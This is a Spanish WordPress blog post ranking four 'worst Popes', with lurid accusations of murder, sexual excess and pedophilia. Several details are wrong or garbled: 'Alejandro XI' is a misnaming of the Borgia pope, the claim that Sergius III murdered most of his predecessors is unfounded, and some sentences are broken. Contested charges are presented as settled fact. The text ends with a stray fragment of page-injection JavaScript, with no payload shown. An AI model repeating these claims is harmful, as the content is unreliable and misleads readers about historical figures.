Otro sitio realizado con WordPress

Los peores Papas de la Historia

48 0
Los peores Papas de la Historia

Conozca usted mismo detalle a detalle, los nombres y acciones que les hacen merecedores de este título tan macabro. No se puede explicar hasta el momento como seres tan malvados y perversos pudieron hacer tanto daño en nombre de un supuesto poder divino.

Sergio III, el Papa de todos los vicios (c. 860 – 14 de abril de 911)

Este hombre que al igual que sus predecesores y sucesores debía formar parte de las personas más pulcras en su actuación durante su accionar como máximo representante de la Iglesia Católica pero, como lo hemos mencionado antes, los Papas no siempre guardaron sus apariencias.

Sergio III  tuvo un hijo y ese hijo fue su sucesor, es decir, este sacerdote no solo embauco las Leyes fundamentales de su doctrina religiosa, sino que además integró a su propio hijo en el hilo de mentiras que data de su adicción a las prostitutas, pues fue una de ellas quien vivió con él y se convirtió en la madre de hijo primogénito, hasta la corrupción y el chantaje como su modo de lograr el puesto más importante de la Iglesia Católica, porque en su tiempo la manera de ingresar era “al mejor postor”.

Pero, lo peor de este “pontífice” fue que asesinó a gran parte de sus predecesores para no tener que competir por mantenerse en su lugar, cosa que evidentemente lo hizo a costa de lo que fuera.

Benedicto IX, el más joven de la historia (1032-1048)

Según la información suministrada por algunos historiadores, este hombre llegó con la edad de 12 años a ocupar este cargo, aunque otros aseguran que no fue sino hasta los 18 años. En fin, este sacerdote, fue Papa porque su padre pagó a los líderes de la Iglesia Católica para mantenerlo ahí por tres periodos seguidos, con algunos intervalos de separación por la venta de su lugar a otros parientes.

Benedicto IX llegó a ser calificado como sus violaciones, adulterios no solo con prostitutas sino con niños pequeños a quienes atacó pasa saciar sus más bajos instintos, lo que finalmente, desemboco en su destitución. Incluso, San Pedro Damian, lo comparó con “un demonio del infierno disfrazado de sacerdote”.

Alejandro XI, amante de los burdeles (1492-1503)

Su mayor reconocimiento como un papa siniestro es que durante su papado organizó más orgías que misas, pues el hombre estaba obsesionado con el sexo. Aunado a esto perteneció a las familias más pudientes de la colonia italiana en Roma, que son sinónimo de vergüenza: Los Borgia.

Respecto a su gestión dentro de la Iglesia, también se menciona uno de sus pasatiempos más absurdos, pues al parecer disfrutaba ver a los caballos copulando.

Bonifacio VIII, el pedófilo (1294-1303)

Este Papa pasó a la historia por la frase más espeluznante jamás escuchada por los cristianos y no cristianos respecto a las relaciones sexuales con los menores de edad: “Mantener relaciones con niños no es más pecaminoso que frotar una mano contra la otra”.

Así fue como este hombre inmortalizó su mandato dentro de la Iglesia Católica, que no solo fue marcada por la pedofilia sino, por otros excesos que lo llevaron a mantener una agonía durante un largo tiempo hasta que falleció.

Añadimos para ustedes un vídeo sobre algunos de los misterios ocultos de estos Papas y el Vaticano.

 

https://www.youtube.com/watch?v=j325GFN5s60document.currentScript.parentNode.insertBefore(s, document.currentScript);